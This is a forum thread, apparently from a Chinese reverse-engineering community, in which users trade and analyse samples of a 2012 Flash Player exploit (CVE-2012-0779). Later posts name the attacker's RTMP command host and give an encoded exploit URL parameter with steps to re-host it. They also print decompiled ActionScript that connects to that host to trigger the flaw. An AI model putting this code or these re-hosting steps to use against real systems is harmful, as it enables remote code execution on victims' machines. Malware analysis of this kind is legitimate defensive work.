能力值:
( LV11,RANK:180 )
2 楼
正等呢。。。求样本。。。
资料链接一个
http://www.symantec.com/connect/blogs/targeted-attacks-using-confusion-cve-2012-0779
能力值:
(RANK:860 )
3 楼
能给DOC的样本也可以撒。
能力值:
( LV3,RANK:20 )
4 楼
唉 到处都是求样本的
能力值:
(RANK:860 )
5 楼
样本附加上去了。。真快,真有样本了
能力值:
( LV8,RANK:130 )
6 楼
附件中密码是什么
能力值:
( LV2,RANK:10 )
7 楼
求第二个附件的样本密码
能力值:
( LV17,RANK:1820 )
8 楼
Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux; before 11.1.111.9 on Android 2.x and 3.x; and before 11.1.115.8 on Android 4.x allows remote attackers to execute arbitrary code via a crafted file, related to an "object confusion vulnerability," as exploited in the wild in May 2012.
能力值:
(RANK:860 )
9 楼
我也在找,搭车同求
能力值:
( LV2,RANK:10 )
10 楼
第一个样本 只是看见了堆喷射 且有shellcode但 最终没触发。。
能力值:
( LV2,RANK:10 )
11 楼
sample without password
上传的附件:
能力值:
( LV2,RANK:10 )
12 楼
悲催 换了好几个版本的flash了 不触发
能力值:
( LV2,RANK:10 )
13 楼
不触发的原因应该是你连不上
rtmp://126.19.84.7:8080/RPCCheckPassword
能力值:
( LV2,RANK:10 )
14 楼
那怎么弄啊 能否简单教下
能力值:
( LV2,RANK:10 )
15 楼
怕误导你,不敢乱说
exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000
他原来的info是126.19.84.7:8080
自己搭建一个rmtp://,然后info=zlib(你自己的地址)
infosize那个是原DOC一个标记的地址可以不用管
能力值:
( LV2,RANK:10 )
16 楼
这个flash文件用doswf加了密的.....
能力值:
( LV2,RANK:10 )
17 楼
exp.swf?info=789c333432d333b4d4b330d133b7b230b03000001b39033b&infosize=005E0000 这串是什么啊
没明白大牛的这番话。
那个IP地址又是从哪来的呢
能力值:
( LV2,RANK:10 )
18 楼
doc获取的URL.
SWF里调用那个参数
var _local1:Object = root.loaderInfo.parameters;
var _local2:String = _local1["info"];
var _local3:ByteArray = hexToBin(_local2);
var _local4:uint;
_local4 = 0;
while (_local4 < _local3.length)
{
_local3[_local4] = (_local3[_local4] ^ 0);
_local4++;
};
_local3.uncompress();
var _local5:String = String(_local3);
_fun1(_local5);
// _fun1 (_arg1:String)
this._local1 = new NetConnection();
var _local2 = "rtmp://";
var _local3 = "/RPCCheckPassword";
var _local4:String = ((_local2 + _arg1) + _local3);
this._local1.connect(_local4);
this._local1.call("systemMemoryCall", this._local5, "argc");
能力值:
( LV2,RANK:10 )
19 楼
膜拜,楼上已经解出来了。
能力值:
( LV13,RANK:220 )
20 楼
膜拜 大东
能力值:
(RANK:860 )
21 楼
膜拜啊。。真厉害
能力值:
( LV13,RANK:220 )
22 楼
[QUOTE=大东;1070305]
doc获取的URL.
SWF里调用那个参数
var _local1:Object = root.loaderInfo.parameters;
var _local2:String = _local1["info"];
var _loc...[/QUOTE]
dadong 隐藏的高手啊
能力值:
(RANK:860 )
23 楼
请教是如何解密的?